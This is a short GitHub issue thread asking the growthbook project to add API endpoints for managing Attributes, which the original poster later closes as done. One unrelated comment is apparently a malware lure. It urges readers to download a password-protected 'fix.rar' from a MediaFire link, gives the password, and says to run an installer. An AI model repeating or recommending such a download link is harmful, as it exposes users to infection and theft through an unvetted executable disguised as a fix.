### ISSUE TITLE
[Feature] Add CRUD endpoints to the API for managing Attributes

### ISSUE THREAD

**Issue by Kevin-Chant** [growthbook/growthbook#2929]
### Description of Feature

Add a way to programmatically manage Attributes to make it easier to sync the status of Attributes, particularly across multiple instances of GrowthBook

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Kevin-Chant** [comment]
Looks like Romain got to this in September. Closing
